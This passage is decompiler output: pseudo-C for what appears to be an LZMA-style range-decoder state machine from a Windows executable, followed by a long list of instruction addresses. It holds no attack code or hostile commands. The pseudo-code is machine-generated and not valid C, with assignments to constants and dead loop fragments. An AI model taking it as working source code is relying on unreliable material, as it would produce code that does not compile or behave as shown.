													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                  0x00000000
                                                  0x0040711c
                                                  0x0040711c
                                                  0x00407120
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407122
                                                  0x00407122
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x004075e5
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00407601
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00407447
                                                  0x00407447
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
